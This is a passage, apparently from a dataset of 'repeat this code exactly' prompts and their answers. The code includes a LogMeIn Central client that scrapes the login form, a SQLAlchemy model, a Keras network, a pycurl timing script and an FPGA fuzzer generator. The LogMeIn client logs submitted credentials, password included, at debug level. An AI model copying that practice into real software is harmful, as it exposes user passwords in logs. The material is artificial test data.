RuntimeError('No login form could be found!')\n auth_url = urlparse.urljoin(response.url, form['action'])\n auth_method = form.attrs.get('method', 'POST').lower()\n fields = form.find_all('input', attrs={'name': True})\n auth_data = {}\n for field in fields:\n name = field['name']\n if name == 'email':\n value = self.email\n elif name == 'password':\n value = self.password\n else:\n value = field.attrs.get('value', '')\n auth_data[name] = value\n # Now submit the login form with the auth data filled in.\n logger.debug('auth url: %s %s', auth_method.upper(), auth_url)\n logger.debug('auth data: %r', auth_data)\n response = getattr(self.session, auth_method)(auth_url, auth_data)\n response.raise_for_status()\n # Look for the current profile ID in the response.\n soup = BeautifulSoup(response.text)\n return self._update_current_profile_id(soup)\n\n def select_profile(self, profile_id):\n # Get the URL used to switch to a new profile.\n url = urlparse.urljoin(self.API_ROOT, '/login/selectprofile.aspx?profile=%d' % profile_id)\n response = self.session.get(url)\n response.raise_for_status()\n # Look for the new profile ID in the response.\n soup = BeautifulSoup(response.text)\n return self._update_current_profile_id(soup)\n\n def get_user_profile_list(self):\n result = self._post('ProfileList.svc/GetUserProfileList')\n return dict([(x['Id'], x['Name']) for x in result['GetUserProfileListResult']['List']])\n\n def get_all_hosts(self):\n result = self._post('Computers.svc/GetAllHostsForCentral')\n return result\n\n def get_host_details(self, host_id):\n url = urlparse.urljoin(self.API_ROOT, '/mycomputers_preferences.asp')\n response = self.session.get(url, params={'hostid': host_id})\n response.raise_for_status()\n soup = BeautifulSoup(response.text)\n host_details = {}\n for hostid_input in soup.select('fieldset > input[name=\"hostid\"]'):\n host_details[u'hostid'] = int(hostid_input['value'])\n for profileid_input in soup.select('fieldset input[name=\"profileid\"]'):\n host_details[u'profileid'] = int(profileid_input['value'])\n for tr in soup.select('fieldset table tr'):\n for n, td in enumerate(tr.find_all('td', recursive=False)):\n if n == 0:\n key_parts = td.get_text(strip=True).replace(':', '').split()\n key_parts = [x.strip().title() for x in key_parts]\n key_parts[0] = key_parts[0].lower()\n key = u''.join(key_parts)\n if key == 'status':\n key = u'statusString'\n elif key == 'group':\n key = u'groupName'\n elif n == 1:\n if key == 'computerDescription':\n value = td.find('input', attrs={'name': 'desc'})['value']\n elif key == 'statusString':\n value = td.get_text('|', strip=True).split('|')[0]\n a_tag = td.find('a', href=True)\n if a_tag:\n host_details[u'connectUrl'] = urlparse.urljoin(response.url, a_tag['href'])\n elif key == 'groupName':\n selected_option = td.find('option', selected=True)\n value = selected_option.get_text()\n host_details[u'groupid'] = int(selected_option['value'])\n elif key == 'note':\n value = td.find('textarea').get_text()\n else:\n value = td.get_text(strip=True)\n host_details[key] = value\n return host_details\n\n def get_host_av_info(self, host_id):\n result = self._post('AntiVirus.svc/GetHostAVInfo', {'hostId': host_id})\n return result['GetHostAVInfoResult']\n\n def connect_to_host(self, host_id):\n url = urlparse.urljoin(self.API_ROOT, '/mycomputers_connect.asp')\n qs = urllib.urlencode({'hostid': host_id})\n url = '%s?%s' % (url, qs)\n webbrowser.open_new_tab(url)\n return\n response = self.session.get(url, params={'hostid': host_id})\n response.raise_for_status()\n soup = BeautifulSoup(response.text)\n meta = soup.find('meta', attrs={'http-equiv': 'refresh', 'content': True})\n url = meta['content'].split(';URL=', 1)[1]\n response = self.session.get(url)\n```<|memory_end|>\nCharacter-for-character where possible.",
"role": "user"
}
] |
```python
# Python
import json
import logging
import re
import urllib
import urlparse
import warnings
import webbrowser
# Requests
import requests
# BeautifulSoup4
from bs4 import BeautifulSoup
__all__ = ['LogMeInCentralAPI']
logger = logging.getLogger('lmiapi.central')
class LogMeInCentralAPI(object): # pragma: no cover
API_ROOT = 'https://secure.logmein.com/api/'
def __init__(self, email, password):
warnings.warn('The LogMeInCentralAPI class is no longer maintained or '
'supported; use LogMeInPublicAPI instead.',
DeprecationWarning)
self.email = email
self.password = password
self.session = requests.Session()
self.session.headers.update({'Accept': 'application/JSON'})
self.current_profile_id = None
def _post(self, path, data=None):
url = '%s%s' % (self.API_ROOT, path.lstrip('/'))
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data or {})
response = self.session.post(url, data=data, headers=headers)
if response.status_code == 401 and self.login():
response = self.session.post(url, data=data, headers=headers)
response.raise_for_status()
logger.debug('POST %s -> %d', url, response.status_code)
return response.json()
def _update_current_profile_id(self, soup):
profile_id = None
alt_link = soup.find('link', rel='alternate', href=re.compile(r'^.*?profileid=\d+?.*?$'))
if alt_link:
alt_parts = urlparse.urlsplit(alt_link['href'])
alt_query = urlparse.parse_qs(alt_parts.query)
profile_id = int(alt_query.get('profileid', ['0'])[0])
self.current_profile_id = profile_id or None
logger.debug('current profile id: %s', str(self.current_profile_id))
return self.current_profile_id
def login(self):
# Read main LogMeIn page at secure.logmein.com.
url = urlparse.urljoin(self.API_ROOT, '/')
response = self.session.get(url)
response.raise_for_status()
# Find login button link.
soup = BeautifulSoup(response.text)
btn_login = soup.find('a', attrs={'class': 'btn-login', 'href': True})
if not btn_login:
raise RuntimeError('Unable to find login button link!')
login_url = urlparse.urljoin(response.url, btn_login['href'])
# Follow the login link.
response = self.session.get(login_url)
response.raise_for_status()
# Try to find the current profile ID in the response. If found, we're
# already logged in.
soup = BeautifulSoup(response.text)
profile_id = self._update_current_profile_id(soup)
if profile_id:
return profile_id
# Otherwise, we were redirected to the login page, so find the login
# form and build up the auth data to send.
form = soup.find('form', id='form', action=True)
if not form:
raise RuntimeError('No login form could be found!')
auth_url = urlparse.urljoin(response.url, form['action'])
auth_method = form.attrs.get('method', 'POST').lower()
fields = form.find_all('input', attrs={'name': True})
auth_data = {}
for field in fields:
name = field['name']
if name == 'email':
value = self.email
elif name == 'password':
value = self.password
else:
value = field.attrs.get('value', '')
auth_data[name] = value
# Now submit the login form with the auth data filled in.
logger.debug('auth url: %s %s', auth_method.upper(), auth_url)
logger.debug('auth data: %r', auth_data)
response = getattr(self.session, auth_method)(auth_url, auth_data)
response.raise_for_status()
# Look for the current profile ID in the response.
soup = BeautifulSoup(response.text)
return self._update_current_profile_id(soup)
def select_profile(self, profile_id):
# Get the URL used to switch to a new profile.
url = urlparse.urljoin(self.API_ROOT, '/login/selectprofile.aspx?profile=%d' % profile_id)
response = self.session.get(url)
response.raise_for_status()
# Look for the new profile ID in the response.
soup = BeautifulSoup(response.text)
return self._update_current_profile_id(soup)
def get_user_profile_list(self):
result = self._post('ProfileList.svc/GetUserProfileList')
return dict([(x['Id'], x['Name']) for x in result['GetUserProfileListResult']['List']])
def get_all_hosts(self):
result = self._post('Computers.svc/GetAllHostsForCentral')
return result
def get_host_details(self, host_id):
url = urlparse.urljoin(self.API_ROOT, '/mycomputers_preferences.asp')
response = self.session.get(url, params={'hostid': host_id})
response.raise_for_status()
soup = BeautifulSoup(response.text)
host_details = {}
for hostid_input in soup.select('fieldset > input[name="hostid"]'):
host_details[u'hostid'] = int(hostid_input['value'])
for profileid_input in soup.select('fieldset input[name="profileid"]'):
host_details[u'profileid'] = int(profileid_input['value'])
for tr in soup.select('fieldset table tr'):
for n, td in enumerate(tr.find_all('td', recursive=False)):
if n == 0:
key_parts = td.get_text(strip=True).replace(':', '').split()
key_parts = [x.strip().title() for x in key_parts]
key_parts[0] = key_parts[0].lower()
key = u''.join(key_parts)
if key == 'status':
key = u'statusString'
elif key == 'group':
key = u'groupName'
elif n == 1:
if key == 'computerDescription':
value = td.find('input', attrs={'name': 'desc'})['value']
elif key == 'statusString':
value = td.get_text('|', strip=True).split('|')[0]
a_tag = td.find('a', href=True)
if a_tag:
host_details[u'connectUrl'] = urlparse.urljoin(response.url, a_tag['href'])
elif key == 'groupName':
selected_option = td.find('option', selected=True)
value = selected_option.get_text()
host_details[u'groupid'] = int(selected_option['value'])
elif key == 'note':
value = td.find('textarea').get_text()
else:
value = td.get_text(strip=True)
host_details[key] = value
return host_details
def get_host_av_info(self, host_id):
result = self._post('AntiVirus.svc/GetHostAVInfo', {'hostId': host_id})
return result['GetHostAVInfoResult']
def connect_to_host(self, host_id):
url = urlparse.urljoin(self.API_ROOT, '/mycomputers_connect.asp')
qs = urllib.urlencode({'hostid': host_id})
url = '%s?%s' % (url, qs)
webbrowser.open_new_tab(url)
return
response = self.session.get(url, params={'hostid': host_id})
response.raise_for_status()
soup = BeautifulSoup(response.text)
meta = soup.find('meta', attrs={'http-equiv': 'refresh', 'content': True})
url = meta['content'].split(';URL=', 1)[1]
response = self.session.get(url)
```
|
[
{
"content": "Here is the code block:\n```python\nfrom __future__ import unicode_literals\n\nfrom sqlalchemy import ForeignKeyConstraint, text\n\nfrom applications.users.models import *\nfrom django.conf import settings\nfrom graphspace.mixins import *\n\nBase = settings.BASE\n\n# ================== Table Definitions =================== #\n\n\nclass UniprotAlias(IDMixin, TimeStampMixin, Base):\n\t__tablename__ = 'uniprot_alias'\n\n\taccession_number = Column(String, nullable=False)\n\talias_source = Column(String, nullable=False)\n\talias_name = Column(String, nullable=False)\n\n\tconstraints = (\n\t\tUniqueConstraint('accession_number', 'alias_source', 'alias_name', name='_uniprot_alias_uc_accession_number_alias_source_alias_name'),\n\t)\n\n\tindices = (\n\t\tIndex('uniprot_alias_idx_accession_number', text(\"accession_number gin_trgm_ops\"), postgresql_using=\"gin\"),\n\t\tIndex('uniprot_alias_idx_alias_name', text(\"alias_name gin_trgm_ops\"), postgresql_using=\"gin\"),\n\t)\n\n\t@declared_attr\n\tdef __table_args__(cls):\n\t\targs = cls.constraints + cls.indices\n\t\treturn args\n\n\tdef serialize(cls, **kwargs):\n\t\treturn {\n\t\t\t# 'id': cls.id,\n\t\t\t'id': cls.accession_number,\n\t\t\t'alias_source': cls.alias_source,\n\t\t\t'alias_name': cls.alias_name,\n\t\t\t'created_at': cls.created_at.isoformat(),\n\t\t\t'updated_at': cls.updated_at.isoformat()\n\t\t}\n```\nOutput it precisely.",
"role": "user"
}
] |
[
{
"content": "Here is the code block:\n<|memory_start|>```python\nfrom __future__ import unicode_literals\n\nfrom sqlalchemy import ForeignKeyConstraint, text\n\nfrom applications.users.models import *\nfrom django.conf import settings\nfrom graphspace.mixins import *\n\nBase = settings.BASE\n\n# ================== Table Definitions =================== #\n\n\nclass UniprotAlias(IDMixin, TimeStampMixin, Base):\n\t__tablename__ = 'uniprot_alias'\n\n\taccession_number = Column(String, nullable=False)\n\talias_source = Column(String, nullable=False)\n\talias_name = Column(String, nullable=False)\n\n\tconstraints = (\n\t\tUniqueConstraint('accession_number', 'alias_source', 'alias_name', name='_uniprot_alias_uc_accession_number_alias_source_alias_name'),\n\t)\n\n\tindices = (\n\t\tIndex('uniprot_alias_idx_accession_number', text(\"accession_number gin_trgm_ops\"), postgresql_using=\"gin\"),\n\t\tIndex('uniprot_alias_idx_alias_name', text(\"alias_name gin_trgm_ops\"), postgresql_using=\"gin\"),\n\t)\n\n\t@declared_attr\n\tdef __table_args__(cls):\n\t\targs = cls.constraints + cls.indices\n\t\treturn args\n\n\tdef serialize(cls, **kwargs):\n\t\treturn {\n\t\t\t# 'id': cls.id,\n\t\t\t'id': cls.accession_number,\n\t\t\t'alias_source': cls.alias_source,\n\t\t\t'alias_name': cls.alias_name,\n\t\t\t'created_at': cls.created_at.isoformat(),\n\t\t\t'updated_at': cls.updated_at.isoformat()\n\t\t}\n```<|memory_end|>\nOutput it precisely.",
"role": "user"
}
] |
```python
from __future__ import unicode_literals
from sqlalchemy import ForeignKeyConstraint, text
from applications.users.models import *
from django.conf import settings
from graphspace.mixins import *
Base = settings.BASE
# ================== Table Definitions =================== #
class UniprotAlias(IDMixin, TimeStampMixin, Base):
__tablename__ = 'uniprot_alias'
accession_number = Column(String, nullable=False)
alias_source = Column(String, nullable=False)
alias_name = Column(String, nullable=False)
constraints = (
UniqueConstraint('accession_number', 'alias_source', 'alias_name', name='_uniprot_alias_uc_accession_number_alias_source_alias_name'),
)
indices = (
Index('uniprot_alias_idx_accession_number', text("accession_number gin_trgm_ops"), postgresql_using="gin"),
Index('uniprot_alias_idx_alias_name', text("alias_name gin_trgm_ops"), postgresql_using="gin"),
)
@declared_attr
def __table_args__(cls):
args = cls.constraints + cls.indices
return args
def serialize(cls, **kwargs):
return {
# 'id': cls.id,
'id': cls.accession_number,
'alias_source': cls.alias_source,
'alias_name': cls.alias_name,
'created_at': cls.created_at.isoformat(),
'updated_at': cls.updated_at.isoformat()
}
```
|
[
{
"content": "Here is the source code:\n```python\nfrom keras.models import Model\nfrom keras.layers import Dense, ZeroPadding2D, BatchNormalization, Conv2D, MaxPooling2D, Activation, Input, Concatenate\nfrom keras.optimizers import RMSprop\nfrom layers.SpatialPyramidPooling import SpatialPyramidPooling\nfrom keras.applications.resnet50 import identity_block, conv_block\n\n\ndef EnhancedHybridResSppNet(class_num, enhanced_class_num):\n _input = Input(shape = (None, None, 3))\n model = _input\n model = ZeroPadding2D((3, 3))(model)\n model = Conv2D(64, (7, 7), strides = (2, 2))(model)\n model = BatchNormalization(axis = 3)(model)\n model = Activation('relu')(model)\n model = MaxPooling2D((3, 3), strides = (2, 2))(model)\n\n model = conv_block(model, 3, [64, 64, 256], stage = 2, block = 'a', strides = (1, 1))\n model = identity_block(model, 3, [64, 64, 256], stage = 2, block = 'b')\n model = identity_block(model, 3, [64, 64, 256], stage = 2, block = 'c')\n\n model = conv_block(model, 3, [128, 128, 512], stage = 3, block = 'a')\n model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'b')\n model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'c')\n model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'd')\n\n model = MaxPooling2D((2, 2))(model)\n\n model = SpatialPyramidPooling([1, 2, 4])(model)\n\n model1 = Dense(units = class_num)(model)\n model1 = Activation(activation = \"softmax\")(model1)\n model1 = Model(_input, model1)\n model1.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])\n\n model2 = Dense(units = enhanced_class_num)(model)\n model2 = Activation(activation = \"softmax\")(model2)\n model2 = Model(_input, model2)\n model2.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])\n\n input2 = Input(shape = (100, ))\n\n model3 = Concatenate((input2, model))\n model3 = Dense(units = class_num)(model3)\n model3 = Activation(activation = \"softmax\")(model3)\n model3 = Model(inputs = [_input, input2], outputs = model3)\n model3.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])\n\n return model1, model2, model3\n```\nRepeat it exactly.",
"role": "user"
}
] |
[
{
"content": "Here is the source code:\n<|memory_start|>```python\nfrom keras.models import Model\nfrom keras.layers import Dense, ZeroPadding2D, BatchNormalization, Conv2D, MaxPooling2D, Activation, Input, Concatenate\nfrom keras.optimizers import RMSprop\nfrom layers.SpatialPyramidPooling import SpatialPyramidPooling\nfrom keras.applications.resnet50 import identity_block, conv_block\n\n\ndef EnhancedHybridResSppNet(class_num, enhanced_class_num):\n _input = Input(shape = (None, None, 3))\n model = _input\n model = ZeroPadding2D((3, 3))(model)\n model = Conv2D(64, (7, 7), strides = (2, 2))(model)\n model = BatchNormalization(axis = 3)(model)\n model = Activation('relu')(model)\n model = MaxPooling2D((3, 3), strides = (2, 2))(model)\n\n model = conv_block(model, 3, [64, 64, 256], stage = 2, block = 'a', strides = (1, 1))\n model = identity_block(model, 3, [64, 64, 256], stage = 2, block = 'b')\n model = identity_block(model, 3, [64, 64, 256], stage = 2, block = 'c')\n\n model = conv_block(model, 3, [128, 128, 512], stage = 3, block = 'a')\n model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'b')\n model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'c')\n model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'd')\n\n model = MaxPooling2D((2, 2))(model)\n\n model = SpatialPyramidPooling([1, 2, 4])(model)\n\n model1 = Dense(units = class_num)(model)\n model1 = Activation(activation = \"softmax\")(model1)\n model1 = Model(_input, model1)\n model1.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])\n\n model2 = Dense(units = enhanced_class_num)(model)\n model2 = Activation(activation = \"softmax\")(model2)\n model2 = Model(_input, model2)\n model2.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])\n\n input2 = Input(shape = (100, ))\n\n model3 = Concatenate((input2, model))\n model3 = Dense(units = class_num)(model3)\n model3 = Activation(activation = \"softmax\")(model3)\n model3 = Model(inputs = [_input, input2], outputs = model3)\n model3.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])\n\n return model1, model2, model3\n```<|memory_end|>\nRepeat it exactly.",
"role": "user"
}
] |
```python
from keras.models import Model
from keras.layers import Dense, ZeroPadding2D, BatchNormalization, Conv2D, MaxPooling2D, Activation, Input, Concatenate
from keras.optimizers import RMSprop
from layers.SpatialPyramidPooling import SpatialPyramidPooling
from keras.applications.resnet50 import identity_block, conv_block
def EnhancedHybridResSppNet(class_num, enhanced_class_num):
_input = Input(shape = (None, None, 3))
model = _input
model = ZeroPadding2D((3, 3))(model)
model = Conv2D(64, (7, 7), strides = (2, 2))(model)
model = BatchNormalization(axis = 3)(model)
model = Activation('relu')(model)
model = MaxPooling2D((3, 3), strides = (2, 2))(model)
model = conv_block(model, 3, [64, 64, 256], stage = 2, block = 'a', strides = (1, 1))
model = identity_block(model, 3, [64, 64, 256], stage = 2, block = 'b')
model = identity_block(model, 3, [64, 64, 256], stage = 2, block = 'c')
model = conv_block(model, 3, [128, 128, 512], stage = 3, block = 'a')
model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'b')
model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'c')
model = identity_block(model, 3, [128, 128, 512], stage = 3, block = 'd')
model = MaxPooling2D((2, 2))(model)
model = SpatialPyramidPooling([1, 2, 4])(model)
model1 = Dense(units = class_num)(model)
model1 = Activation(activation = "softmax")(model1)
model1 = Model(_input, model1)
model1.compile(loss = "categorical_crossentropy", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])
model2 = Dense(units = enhanced_class_num)(model)
model2 = Activation(activation = "softmax")(model2)
model2 = Model(_input, model2)
model2.compile(loss = "categorical_crossentropy", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])
input2 = Input(shape = (100, ))
model3 = Concatenate((input2, model))
model3 = Dense(units = class_num)(model3)
model3 = Activation(activation = "softmax")(model3)
model3 = Model(inputs = [_input, input2], outputs = model3)
model3.compile(loss = "categorical_crossentropy", optimizer = RMSprop(lr = 1e-4, decay = 1e-6), metrics = ['accuracy'])
return model1, model2, model3
```
|
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n```python\n# coding:utf-8\r\nimport os\r\nimport sys\r\nimport pycurl\r\n\r\n\r\nc = pycurl.Curl()\r\nURL = \"http://www.baidu.com/\"\r\nc.setopt(pycurl.URL, URL)\r\n\r\n# 连接超时时间,5秒\r\nc.setopt(pycurl.CONNECTTIMEOUT, 5)\r\n\r\n# 下载超时时间,5秒\r\nc.setopt(pycurl.TIMEOUT, 5)\r\nc.setopt(pycurl.FORBID_REUSE, 1)\r\nc.setopt(pycurl.MAXREDIRS, 1)\r\nc.setopt(pycurl.NOPROGRESS, 1)\r\nc.setopt(pycurl.DNS_CACHE_TIMEOUT,30)\r\nindexfile = open(os.path.dirname(os.path.realpath(__file__))+\"/content.txt\", \"wb\")\r\nc.setopt(pycurl.WRITEHEADER, indexfile)\r\nc.setopt(pycurl.WRITEDATA, indexfile)\r\ntry:\r\n c.perform()\r\nexcept Exception,e:\r\n print \"connecion error:\"+str(e)\r\n indexfile.close()\r\n c.close()\r\n sys.exit()\r\n\r\nNAMELOOKUP_TIME = c.getinfo(c.NAMELOOKUP_TIME)\r\nCONNECT_TIME = c.getinfo(c.CONNECT_TIME)\r\nPRETRANSFER_TIME = c.getinfo(c.PRETRANSFER_TIME)\r\nSTARTTRANSFER_TIME = c.getinfo(c.STARTTRANSFER_TIME)\r\nTOTAL_TIME = c.getinfo(c.TOTAL_TIME)\r\nHTTP_CODE = c.getinfo(c.HTTP_CODE)\r\nSIZE_DOWNLOAD = c.getinfo(c.SIZE_DOWNLOAD)\r\nHEADER_SIZE = c.getinfo(c.HEADER_SIZE)\r\nSPEED_DOWNLOAD = c.getinfo(c.SPEED_DOWNLOAD)\r\n\r\nprint \"HTTP状态码:%s\" % (HTTP_CODE)\r\nprint \"DNS解析时间:%.2f ms\" % (NAMELOOKUP_TIME*1000)\r\nprint \"建立连接时间:%.2f ms\" % (CONNECT_TIME*1000)\r\nprint \"准备传输时间:%.2f ms\" % (PRETRANSFER_TIME*1000)\r\nprint \"传输开始时间:%.2f ms\" % (STARTTRANSFER_TIME*1000)\r\nprint \"传输结束总时间:%.2f ms\" % (TOTAL_TIME*1000)\r\n\r\nprint \"下载数据包大小:%d bytes/s\" %(SIZE_DOWNLOAD)\r\nprint \"HTTP头部大小:%d byte\" %(HEADER_SIZE)\r\nprint \"平均下载速度:%d bytes/s\" %(SPEED_DOWNLOAD)\r\n\r\nindexfile.close()\r\nc.close()\n```",
"role": "user"
}
] |
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n<|memory_start|>```python\n# coding:utf-8\r\nimport os\r\nimport sys\r\nimport pycurl\r\n\r\n\r\nc = pycurl.Curl()\r\nURL = \"http://www.baidu.com/\"\r\nc.setopt(pycurl.URL, URL)\r\n\r\n# 连接超时时间,5秒\r\nc.setopt(pycurl.CONNECTTIMEOUT, 5)\r\n\r\n# 下载超时时间,5秒\r\nc.setopt(pycurl.TIMEOUT, 5)\r\nc.setopt(pycurl.FORBID_REUSE, 1)\r\nc.setopt(pycurl.MAXREDIRS, 1)\r\nc.setopt(pycurl.NOPROGRESS, 1)\r\nc.setopt(pycurl.DNS_CACHE_TIMEOUT,30)\r\nindexfile = open(os.path.dirname(os.path.realpath(__file__))+\"/content.txt\", \"wb\")\r\nc.setopt(pycurl.WRITEHEADER, indexfile)\r\nc.setopt(pycurl.WRITEDATA, indexfile)\r\ntry:\r\n c.perform()\r\nexcept Exception,e:\r\n print \"connecion error:\"+str(e)\r\n indexfile.close()\r\n c.close()\r\n sys.exit()\r\n\r\nNAMELOOKUP_TIME = c.getinfo(c.NAMELOOKUP_TIME)\r\nCONNECT_TIME = c.getinfo(c.CONNECT_TIME)\r\nPRETRANSFER_TIME = c.getinfo(c.PRETRANSFER_TIME)\r\nSTARTTRANSFER_TIME = c.getinfo(c.STARTTRANSFER_TIME)\r\nTOTAL_TIME = c.getinfo(c.TOTAL_TIME)\r\nHTTP_CODE = c.getinfo(c.HTTP_CODE)\r\nSIZE_DOWNLOAD = c.getinfo(c.SIZE_DOWNLOAD)\r\nHEADER_SIZE = c.getinfo(c.HEADER_SIZE)\r\nSPEED_DOWNLOAD = c.getinfo(c.SPEED_DOWNLOAD)\r\n\r\nprint \"HTTP状态码:%s\" % (HTTP_CODE)\r\nprint \"DNS解析时间:%.2f ms\" % (NAMELOOKUP_TIME*1000)\r\nprint \"建立连接时间:%.2f ms\" % (CONNECT_TIME*1000)\r\nprint \"准备传输时间:%.2f ms\" % (PRETRANSFER_TIME*1000)\r\nprint \"传输开始时间:%.2f ms\" % (STARTTRANSFER_TIME*1000)\r\nprint \"传输结束总时间:%.2f ms\" % (TOTAL_TIME*1000)\r\n\r\nprint \"下载数据包大小:%d bytes/s\" %(SIZE_DOWNLOAD)\r\nprint \"HTTP头部大小:%d byte\" %(HEADER_SIZE)\r\nprint \"平均下载速度:%d bytes/s\" %(SPEED_DOWNLOAD)\r\n\r\nindexfile.close()\r\nc.close()\n```<|memory_end|>",
"role": "user"
}
] |
```python
# coding:utf-8
import os
import sys
import pycurl
c = pycurl.Curl()
URL = "http://www.baidu.com/"
c.setopt(pycurl.URL, URL)
# 连接超时时间,5秒
c.setopt(pycurl.CONNECTTIMEOUT, 5)
# 下载超时时间,5秒
c.setopt(pycurl.TIMEOUT, 5)
c.setopt(pycurl.FORBID_REUSE, 1)
c.setopt(pycurl.MAXREDIRS, 1)
c.setopt(pycurl.NOPROGRESS, 1)
c.setopt(pycurl.DNS_CACHE_TIMEOUT,30)
indexfile = open(os.path.dirname(os.path.realpath(__file__))+"/content.txt", "wb")
c.setopt(pycurl.WRITEHEADER, indexfile)
c.setopt(pycurl.WRITEDATA, indexfile)
try:
c.perform()
except Exception,e:
print "connecion error:"+str(e)
indexfile.close()
c.close()
sys.exit()
NAMELOOKUP_TIME = c.getinfo(c.NAMELOOKUP_TIME)
CONNECT_TIME = c.getinfo(c.CONNECT_TIME)
PRETRANSFER_TIME = c.getinfo(c.PRETRANSFER_TIME)
STARTTRANSFER_TIME = c.getinfo(c.STARTTRANSFER_TIME)
TOTAL_TIME = c.getinfo(c.TOTAL_TIME)
HTTP_CODE = c.getinfo(c.HTTP_CODE)
SIZE_DOWNLOAD = c.getinfo(c.SIZE_DOWNLOAD)
HEADER_SIZE = c.getinfo(c.HEADER_SIZE)
SPEED_DOWNLOAD = c.getinfo(c.SPEED_DOWNLOAD)
print "HTTP状态码:%s" % (HTTP_CODE)
print "DNS解析时间:%.2f ms" % (NAMELOOKUP_TIME*1000)
print "建立连接时间:%.2f ms" % (CONNECT_TIME*1000)
print "准备传输时间:%.2f ms" % (PRETRANSFER_TIME*1000)
print "传输开始时间:%.2f ms" % (STARTTRANSFER_TIME*1000)
print "传输结束总时间:%.2f ms" % (TOTAL_TIME*1000)
print "下载数据包大小:%d bytes/s" %(SIZE_DOWNLOAD)
print "HTTP头部大小:%d byte" %(HEADER_SIZE)
print "平均下载速度:%d bytes/s" %(SPEED_DOWNLOAD)
indexfile.close()
c.close()
```
|
[
{
"content": "Recreate the entire code block with identical formatting:\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2017-2020 The Project X-Ray Authors.\n#\n# Use of this source code is governed by a ISC-style\n# license that can be found in the LICENSE file or at\n# https://opensource.org/licenses/ISC\n#\n# SPDX-License-Identifier: ISC\nimport os, random\nrandom.seed(0)\nfrom prjxray import util\nfrom prjxray import verilog\n\n# INCREMENT is the amount of additional CLBN to be instantiated in the design.\n# This makes the fuzzer compilation more robust against failures.\nINCREMENT = os.getenv('CLBN', 0)\nCLBN = 600 + int(INCREMENT)\nprint('//Requested CLBs: %s' % str(CLBN))\n\n\ndef gen_slicels():\n for _tile_name, site_name, _site_type in util.get_roi().gen_sites(\n ['SLICEL']):\n yield site_name\n\n\ndef gen_slicems():\n for _tile_name, site_name, _site_type in util.get_roi().gen_sites(\n ['SLICEM']):\n yield site_name\n\n\nDIN_N = CLBN * 8\nDOUT_N = CLBN * 8\n\nverilog.top_harness(DIN_N, DOUT_N)\n\nf = open('params.csv', 'w')\nf.write('module,loc,n\\n')\nslicels = gen_slicels()\nslicems = gen_slicems()\nprint(\n 'module roi(input clk, input [%d:0] din, output [%d:0] dout);' %\n (DIN_N - 1, DOUT_N - 1))\nfor i in range(CLBN):\n\n use_slicem = (i % 2) == 0\n\n if use_slicem:\n loc = next(slicems)\n variants = ['AX', 'CY', 'F78', 'O5', 'O6', 'XOR', 'MC31']\n else:\n loc = next(slicels)\n variants = ['AX', 'CY', 'F78', 'O5', 'O6', 'XOR']\n\n modules = ['clb_NFFMUX_' + x for x in variants]\n module = random.choice(modules)\n\n if module == 'clb_NFFMUX_MC31':\n n = 3 # Only DOUTMUX has MC31 input\n elif module == 'clb_NFFMUX_F78':\n n = random.randint(0, 2)\n else:\n n = random.randint(0, 3)\n\n print(' %s' % module)\n print(' #(.LOC(\"%s\"), .N(%d))' % (loc, n))\n print(\n ' clb_%d (.clk(clk), .din(din[ %d +: 8]), .dout(dout[ %d +: 8]));'\n % (i, 8 * i, 8 * i))\n\n f.write('%s,%s,%s\\n' % (module, loc, n))\nf.close()\nprint(\n '''endmodule\n\n// ---------------------------------------------------------------------\n\n''')\n\nprint(\n '''\nmodule myLUT8 (input clk, input [7:0] din,\n output lut8o, output lut7bo, output lut7ao,\n //caro: XOR additional result (main output)\n //carco: CLA result (carry module additional output)\n output caro, output carco,\n output bo5, output bo6,\n output wire mc31,\n output wire ff_q, //always connect to output\n input wire ff_d); //mux output net\n parameter LOC=\"SLICE_FIXME\";\n parameter N=-1;\n parameter ALUT_SRL=0;\n\n wire [3:0] caro_all;\n assign caro = caro_all[N];\n wire [3:0] carco_all;\n assign carco = carco_all[N];\n\n wire [3:0] lutno6;\n wire [3:0] lutno5;\n assign bo5 = lutno5[N];\n assign bo6 = lutno6[N];\n\n //Outputs does not have to be used, will stay without it\n (* LOC=LOC, BEL=\"F8MUX\", KEEP, DONT_TOUCH *)\n MUXF8 mux8 (.O(lut8o), .I0(lut7bo), .I1(lut7ao), .S(din[6]));\n (* LOC=LOC, BEL=\"F7BMUX\", KEEP, DONT_TOUCH *)\n MUXF7 mux7b (.O(lut7bo), .I0(lutno6[3]), .I1(lutno6[2]), .S(din[6]));\n (* LOC=LOC, BEL=\"F7AMUX\", KEEP, DONT_TOUCH *)\n MUXF7 mux7a (.O(lut7ao), .I0(lutno6[1]), .I1(lutno6[0]), .S(din[6]));\n\n (* LOC=LOC, BEL=\"D6LUT\", KEEP, DONT_TOUCH *)\n LUT6_2 #(\n .INIT(64'h8000_DEAD_0000_0001)\n ) lutd (\n .I0(din[0]),\n .I1(din[1]),\n .I2(din[2]),\n .I3(din[3]),\n .I4(din[4]),\n .I5(din[5]),\n .O5(lutno5[3]),\n .O6(lutno6[3]));\n\n (* LOC=LOC, BEL=\"C6LUT\", KEEP, DONT_TOUCH *)\n LUT6_2 #(\n .INIT(64'h8000_BEEF_0000_0001)\n ) 